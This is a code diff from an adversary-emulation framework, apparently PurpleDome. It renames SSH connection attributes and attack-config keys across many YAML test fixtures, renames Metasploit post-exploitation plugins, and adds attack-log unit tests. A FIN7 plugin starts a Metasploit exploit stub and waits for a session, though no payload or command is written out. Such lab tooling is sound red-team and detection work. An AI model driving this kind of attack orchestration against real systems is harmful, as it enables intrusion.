self.vprint(uhp, 3)
self.c = Connection(uhp, connect_timeout=timeout, user=self.config.ssh_user(), connect_kwargs=args)
self.connection = Connection(uhp, connect_timeout=timeout, user=self.config.ssh_user(), connect_kwargs=args)
except (paramiko.ssh_exception.SSHException, socket.timeout):
self.vprint(f"Failed to connect, will retry {retries} times. Timeout: {timeout}", 0)
retries -= 1
timeout += 10
time.sleep(retry_sleep)
else:
self.vprint(f"Connection: {self.c}", 3)
return self.c
self.vprint(f"Connection: {self.connection}", 3)
return self.connection
self.vprint("SSH network error", 0)
raise NetworkError
@ -71,21 +77,21 @@ class SSHFeatures(BasePlugin):
self.vprint("Running SSH remote run: " + cmd, 3)
self.vprint("Disown: " + str(disown), 3)
# self.vprint("Connection: " + self.connection, 1)
result = None
retry = 2
while retry > 0:
try:
result = self.c.run(cmd, disown=disown)
result = self.connection.run(cmd, disown=disown)
print(result)
# paramiko.ssh_exception.SSHException in the next line is needed for windows openssh
except (paramiko.ssh_exception.NoValidConnectionsError, UnexpectedExit, paramiko.ssh_exception.SSHException):
except (paramiko.ssh_exception.NoValidConnectionsError, UnexpectedExit, paramiko.ssh_exception.SSHException) as error:
if retry <= 0:
raise NetworkError
else:
self.disconnect()
self.connect()
retry -= 1
self.vprint("Got some SSH errors. Retrying", 2)
raise NetworkError from error
self.disconnect()
self.connect()
retry -= 1
self.vprint("Got some SSH errors. Retrying", 2)
else:
break
@ -113,7 +119,7 @@ class SSHFeatures(BasePlugin):
timeout = 30
while retries:
try:
res = self.c.put(src, dst)
res = self.connection.put(src, dst)
except (paramiko.ssh_exception.SSHException, socket.timeout, UnexpectedExit):
self.vprint(f"PUT Failed to connect, will retry {retries} times. Timeout: {timeout}", 3)
retries -= 1
@ -121,8 +127,8 @@ class SSHFeatures(BasePlugin):
time.sleep(retry_sleep)
self.disconnect()
self.connect()
except FileNotFoundError as e:
self.vprint(f"File not found: {e}", 0)
except FileNotFoundError as error:
self.vprint(f"File not found: {error}", 0)
break
else:
return res
@ -144,17 +150,16 @@ class SSHFeatures(BasePlugin):
retry = 2
while retry > 0:
try:
res = self.c.get(src, dst)
except (paramiko.ssh_exception.NoValidConnectionsError, UnexpectedExit):
res = self.connection.get(src, dst)
except (paramiko.ssh_exception.NoValidConnectionsError, UnexpectedExit) as error:
if retry <= 0:
raise NetworkError
else:
self.disconnect()
self.connect()
retry -= 1
self.vprint("Got some SSH errors. Retrying", 2)
except FileNotFoundError as e:
self.vprint(e, 0)
raise NetworkError from error
self.disconnect()
self.connect()
retry -= 1
self.vprint("Got some SSH errors. Retrying", 2)
except FileNotFoundError as error:
self.vprint(error, 0)
break
else:
break
@ -163,6 +168,6 @@ class SSHFeatures(BasePlugin):
def disconnect(self):
""" Disconnect from a machine """
if self.c:
self.c.close()
self.c = None
if self.connection:
self.connection.close()
self.connection = None

@ -32,7 +32,7 @@ class FIN7Plugin(AttackPlugin):
if self.metasploit_1:
return self.metasploit_1
self.metasploit_1 = Metasploit(self.metasploit_password, attacker=self.attacker_machine_plugin, username=self.metasploit_user)
self.metasploit_1 = Metasploit(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user)
self.metasploit_1.start_exploit_stub_for_external_payload(payload=self.payload_type_1)
self.metasploit_1.wait_for_session()
return self.metasploit_1

@ -139,8 +139,8 @@ caldera_conf:
###
# Kali tool based attacks. Will result in kali commandline tools to be called. Currently supported are: "hydra"
kali_attacks:
# Plugin based attacks. Will result in plugins being called
plugin_based_attacks:
###
# Linux specific attacks, a list
linux:
@ -150,8 +150,8 @@ kali_attacks:
- fin7_1
###
# Configuration for the kali attack tools
kali_conf:
# Configuration for the plugin based attack tools
attack_conf:
###
# Hydra configuration
hydra:

@ -6,7 +6,7 @@ from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
class MetasploitMigratePlugin(AttackPlugin):
class MetasploitClearevPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_clearev"

@ -6,7 +6,7 @@ from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
class MetasploitKeyloggingPlugin(AttackPlugin):
class MetasploitGetuidPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_getuid"

@ -6,7 +6,7 @@ from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
class MetasploitKeyloggingPlugin(AttackPlugin):
class MetasploitSysinfoPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_sysinfo"

@ -25,8 +25,6 @@ class LinuxFilebeatPlugin(SensorPlugin):
def process_templates(self):
""" process jinja2 templates of the config files and insert own config """
# TODO: Implement
env = Environment(
loader=FileSystemLoader(self.get_plugin_path(), encoding='utf-8', followlinks=False),
autoescape=select_autoescape()

@ -28,7 +28,7 @@ class VagrantPlugin(SSHFeatures, MachineryPlugin):
super().__init__()
self.plugin_path = __file__
self.v = None
self.c = None
self.connection = None
self.vagrantfilepath = None
self.vagrantfile = None
self.sysconf = {}
@ -80,13 +80,13 @@ class VagrantPlugin(SSHFeatures, MachineryPlugin):
# For linux we are using Vagrant style
if self.config.os() == "linux":
if self.c:
return self.c
if self.connection:
return self.connection
uhp = self.v.user_hostname_port(vm_name=self.config.vmname())
self.vprint(f"Connecting to {uhp}", 3)
self.c = Connection(uhp, connect_kwargs={"key_filename": self.v.keyfile(vm_name=self.config.vmname())})
return self.c
self.connection = Connection(uhp, connect_kwargs={"key_filename": self.v.keyfile(vm_name=self.config.vmname())})
return self.connection
else:
return super().connect()

@ -12,3 +12,4 @@ straight.plugin==1.5.0
sphinxcontrib.asciinema==0.3.2
paramiko==2.7.2
pymetasploit3==1.0.3
pylint

@ -239,8 +239,8 @@ caldera_attacks:
- "bd527b63-9f9e-46e0-9816-b8434d2b8989"
###
# Kali tool based attacks. Will result in kali commandline tools to be called. Currently supported are: "hydra"
kali_attacks:
# Plugin based attacks. Will result in plugins being called
plugin_based_attacks:
###
# Linux specific attacks, a list
linux:
@ -253,8 +253,8 @@ kali_attacks:
- nmap
###
# Configuration for the kali attack tools
kali_conf:
# Configuration for the plugin based attack tools
attack_conf:
###
# Hydra configuration
hydra:

@ -121,8 +121,8 @@ caldera_attacks:
- "bd527b63-9f9e-46e0-9816-b8434d2b8989"
###
# Kali tool based attacks. Will result in kali commandline tools to be called. Currently supported are: "hydra"
kali_attacks:
# Plugin based attacks. Will result in plugins being called
plugin_based_attacks:
###
# Linux specific attacks, a list
linux:
@ -133,8 +133,8 @@ kali_attacks:
- hydra
###
# Configuration for the kali attack tools
kali_conf:
# Configuration for the plugin based attack tools
attack_conf:
###
# Hydra configuration
hydra:

@ -109,8 +109,8 @@ caldera_attacks:
## A bug in production was triggered by this half config. Adding a unit test
###
# Kali tool based attacks. Will result in kali commandline tools to be called. Currently supported are: "hydra"
kali_attacks:
# Plugin based attacks. Will result in plugins being called
plugin_based_attacks:
###
# Linux specific attacks, a list
linux:
@ -121,8 +121,8 @@ kali_attacks:
# - hydra
###
# Configuration for the kali attack tools
kali_conf:
# Configuration for the plugin based attack tools
attack_conf:
###
# Hydra configuration
hydra:

@ -108,8 +108,8 @@ targets:
# This is intentionally missing !!!!
###
# Kali tool based attacks. Will result in kali commandline tools to be called. Currently supported are: "hydra"
#kali_attacks:
# Plugin based attacks. Will result in plugins being called
#plugin_based_attacks:
###
# Linux specific attacks, a list
# linux:
@ -120,8 +120,8 @@ targets:
# - hydra
###
# Configuration for the kali attack tools
kali_conf:
# Configuration for the plugin based attack tools
attack_conf:
###
# Hydra configuration
hydra:

@ -118,8 +118,8 @@ caldera_attacks:
- "bar"
###
# Kali tool based attacks. Will result in kali commandline tools to be called. Currently supported are: "hydra"
kali_attacks:
# Plugin based attacks. Will result in plugins being called
plugin_based_attacks:
###
# Linux specific attacks, a list
linux:
@ -132,8 +132,8 @@ kali_attacks:
- skylla
###
# Configuration for the kali attack tools
kali_conf:
# Configuration for the plugin based attack tools
attack_conf:
###
# Hydra configuration
hydra:

@ -111,8 +111,8 @@ caldera_attacks:
- "bd527b63-9f9e-46e0-9816-b8434d2b8989"
###
# Kali tool based attacks. Will result in kali commandline tools to be called. Currently supported are: "hydra"
kali_attacks:
# Plugin based attacks. Will result in plugins being called
plugin_based_attacks:
###
# Linux specific attacks, a list
linux:
@ -123,8 +123,8 @@ kali_attacks:
- hydra
###
# Configuration for the kali attack tools
kali_conf:
# Configuration for the plugin based attack tools
attack_conf:
###
# Hydra configuration
hydra:

@ -111,8 +111,8 @@ caldera_attacks:
- "bd527b63-9f9e-46e0-9816-b8434d2b8989"
###
# Kali tool based attacks. Will result in kali commandline tools to be called. Currently supported are: "hydra"
kali_attacks:
# Plugin based attacks. Will result in plugins being called
plugin_based_attacks:
###
# Linux specific attacks, a list
linux:
@ -123,8 +123,8 @@ kali_attacks:
- hydra
###
# Configuration for the kali attack tools
kali_conf:
# Configuration for the plugin based attack tools
attack_conf:
###
# Hydra configuration
hydra:

@ -111,8 +111,8 @@ caldera_attacks:
- "bd527b63-9f9e-46e0-9816-b8434d2b8989"
###
# Kali tool based attacks. Will result in kali commandline tools to be called. Currently supported are: "hydra"
kali_attacks:
# Plugin based attacks. Will result in plugins being called
plugin_based_attacks:
###
# Linux specific attacks, a list
linux:
@ -123,8 +123,8 @@ kali_attacks:
- hydra
###
# Configuration for the kali attack tools
kali_conf:
# Configuration for the plugin based attack tools
attack_conf:
###
# Hydra configuration
hydra:

@ -111,8 +111,8 @@ caldera_attacks:
- "bd527b63-9f9e-46e0-9816-b8434d2b8989"
###
# Kali tool based attacks. Will result in kali commandline tools to be called. Currently supported are: "hydra"
kali_attacks:
# Plugin based attacks. Will result in plugins being called
plugin_based_attacks:
###
# Linux specific attacks, a list
linux:
@ -123,8 +123,8 @@ kali_attacks:
- hydra
###
# Configuration for the kali attack tools
kali_conf:
# Configuration for the plugin based attack tools
attack_conf:
###
# Hydra configuration
hydra:

@ -104,8 +104,8 @@ caldera_attacks:
- "bd527b63-9f9e-46e0-9816-b8434d2b8989"
###
# Kali tool based attacks. Will result in kali commandline tools to be called. Currently supported are: "hydra"
kali_attacks:
# Plugin based attacks. Will result in plugins being called
plugin_based_attacks:
###
# Linux specific attacks, a list
linux:
@ -116,8 +116,8 @@ kali_attacks:
- hydra
###
# Configuration for the kali attack tools
kali_conf:
# Configuration for the plugin based attack tools
attack_conf:
###
# Hydra configuration
hydra:

@ -116,8 +116,8 @@ caldera_attacks:
- "bd527b63-9f9e-46e0-9816-b8434d2b8989"
###
# Kali tool based attacks. Will result in kali commandline tools to be called. Currently supported are: "hydra"
kali_attacks:
# Plugin based attacks. Will result in plugins being called
plugin_based_attacks:
###
# Linux specific attacks, a list
linux:
@ -128,8 +128,8 @@ kali_attacks:
- hydra
###
# Configuration for the kali attack tools
kali_conf:
# Configuration for the plugin based attack tools
attack_conf:
###
# Hydra configuration
hydra:

@ -4,6 +4,8 @@
import unittest
from app.attack_log import AttackLog
import app.attack_log
# from unittest.mock import patch, call
# from app.exceptions import ConfigurationError
# https://docs.python.org/3/library/unittest.html
@ -203,3 +205,83 @@ class TestMachineConfig(unittest.TestCase):
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["plugin_name"], attack_name)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
def test_file_write_start(self):
""" Starting a file write """
al = AttackLog()
source = "asource"
target = "a target"
file_name = "a generic filename"
al.start_file_write(source=source,
target=target,
file_name=file_name,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "start")
self.assertEqual(data[0]["type"], "dropping_file")
self.assertEqual(data[0]["sub-type"], "by PurpleDome")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["file_name"], file_name)
def test_file_write_stop(self):
""" Stopping a file write """
al = AttackLog()
source = "asource"
target = "a target"
file_name = "a generic filename"
al.stop_file_write(source=source,
target=target,
file_name=file_name,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "stop")
self.assertEqual(data[0]["type"], "dropping_file")
self.assertEqual(data[0]["sub-type"], "by PurpleDome")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["file_name"], file_name)
def test_execute_payload_start(self):
""" Starting a execute payload """
al = AttackLog()
source = "asource"
target = "a target"
command = "a generic command"
al.start_execute_payload(source=source,
target=target,
command=command,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "start")
self.assertEqual(data[0]["type"], "execute_payload")
self.assertEqual(data[0]["sub-type"], "by PurpleDome")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["command"], command)
def test_execute_payload_stop(self):
""" Stopping a execute payload """
al = AttackLog()
source = "asource"
target = "a target"
command = "a generic command"
al.stop_execute_payload(source=source,
target=target,
command=command,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "stop")
self.assertEqual(data[0]["type"], "execute_payload")
self.assertEqual(data[0]["sub-type"], "by PurpleDome")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["command"], command)
def test_mitre_fix_ttp_is_none(self):
""" Testing the mitre ttp fix for ttp being none """
self.assertEqual(app.attack_log.__mitre_fix_ttp__(None), "")
def test_mitre_fix_ttp_is_MITRE_SOMETHING(self):
""" Testing the mitre ttp fix for ttp being MITRE_ """
self.assertEqual(app.attack_log.__mitre_fix_ttp__("MITRE_FOO"), "MITRE_FOO")

@ -269,9 +269,6 @@ class TestExample(unittest.TestCase):
"relationships": [],
"facts": []
}
exp2 = {"index": "sources",
"name": "source_name"
}
exp3 = {"index": "operations",
"name": name,
"state": state,
@ -288,7 +285,7 @@ class TestExample(unittest.TestCase):
with patch.object(self.cc, "__contact_server__", return_value=None) as mock_method:
self.cc.add_operation(name, advid, group, state)
# mock_method.assert_called_once_with(exp, method="put")
mock_method.assert_has_calls([call(exp1, method="put"), call(exp2), call(exp3, method="put")])
mock_method.assert_has_calls([call(exp1, method="put"), call(exp3, method="put")])
# add_operation defaults
def test_add_operation_defaults(self):
@ -301,9 +298,6 @@ class TestExample(unittest.TestCase):
"relationships": [],
"facts": []
}
exp2 = {"index": "sources",
"name": "source_name"
}
exp3 = {"index": "operations",
"name": name,
"state": "running", # default
@ -319,7 +313,7 @@ class TestExample(unittest.TestCase):
}
with patch.object(self.cc, "__contact_server__", return_value=None) as mock_method:
self.cc.add_operation(name, advid)
mock_method.assert_has_calls([call(exp1, method="put"), call(exp2), call(exp3, method="put")])
mock_method.assert_has_calls([call(exp1, method="put"), call(exp3, method="put")])
# add_adversary
def test_add_adversary(self):

@ -561,26 +561,26 @@ class TestExperimentConfig(unittest.TestCase):
ex = ExperimentConfig("tests/data/attacker_has_empty_nicknames.yaml")
self.assertEqual(ex._targets[0].get_nicknames(), [1, 2, 3])
def test_missing_kali_config(self):
""" Getting kali config for a specific attack. Attack missing """
def test_missing_attack_config(self):
""" Getting attack config for a specific attack. Attack missing """
ex = ExperimentConfig("tests/data/basic.yaml")
self.assertEqual(ex.kali_conf("BOOM"), {})
self.assertEqual(ex.attack_conf("BOOM"), {})
def test_working_kali_config(self):
""" Getting kali config for a specific attack """
def test_working_attack_config(self):
""" Getting attack config for a specific attack """
ex = ExperimentConfig("tests/data/basic.yaml")
data = ex.kali_conf("hydra")
data = ex.attack_conf("hydra")
self.assertEqual(data["userfile"], "users.txt")
def test_kali_config_missing_attack_data(self):
""" Getting kali config for a specific attack: Missing """
def test_attack_config_missing_attack_data(self):
""" Getting attack config for a specific attack: Missing """
ex = ExperimentConfig("tests/data/attacks_missing.yaml")
data = ex.kali_conf("missing")
data = ex.attack_conf("missing")
self.assertEqual(data, {})
def test_missing_caldera_config_obfuscator(self):
@ -638,28 +638,28 @@ class TestExperimentConfig(unittest.TestCase):
ex = ExperimentConfig("tests/data/attacks_missing.yaml")
self.assertEqual(ex.get_kali_attacks("linux"), [])
self.assertEqual(ex.get_plugin_based_attacks("linux"), [])
def test_kali_attacks_empty(self):
""" zero entries in kali attacks list """
ex = ExperimentConfig("tests/data/attacks_perfect.yaml")
self.assertEqual(ex.get_kali_attacks("missing"), [])
self.assertEqual(ex.get_plugin_based_attacks("missing"), [])
def test_kali_attacks_one(self):
""" One entry in kali attacks list """
ex = ExperimentConfig("tests/data/attacks_perfect.yaml")
self.assertEqual(ex.get_kali_attacks("linux"), ["hydra"])
self.assertEqual(ex.get_plugin_based_attacks("linux"), ["hydra"])
def test_kali_attacks_many(self):
""" Many entries in kali attacks list """
ex = ExperimentConfig("tests/data/attacks_perfect.yaml")
self.assertEqual(ex.get_kali_attacks("windows"), ["hydra", "medusa", "skylla"])
self.assertEqual(ex.get_plugin_based_attacks("windows"), ["hydra", "medusa", "skylla"])
def test_caldera_attacks_missing(self):
""" caldera attacks entry fully missing from config """
@ -673,8 +673,8 @@ class TestExperimentConfig(unittest.TestCase):
ex = ExperimentConfig("tests/data/attacks_half.yaml")
self.assertEqual(ex.get_kali_attacks("linux"), ["hydra"])
self.assertEqual(ex.get_kali_attacks("windows"), [])
self.assertEqual(ex.get_plugin_based_attacks("linux"), ["hydra"])
self.assertEqual(ex.get_plugin_based_attacks("windows"), [])
def test_caldera_attacks_half(self):
""" caldera attacks entry partially missing from config """

@ -32,6 +32,7 @@ globs = ["TODO.md",
"doc/source/index.rst",
"doc/Makefile",
"doc/purpledome.pdf",
"doc/documentation.zip",
"doc/source/*/*.rst",
"doc/source/_static/*.png",
"doc/source/_templates/*",

@ -51,3 +51,4 @@ commands =
bandit -ll -r app/ plugins/ *.py
# Linting
# pylint *.py # currently off. Needs configuration
python3 ./plugin_manager.py check

Loading…
Cancel
Save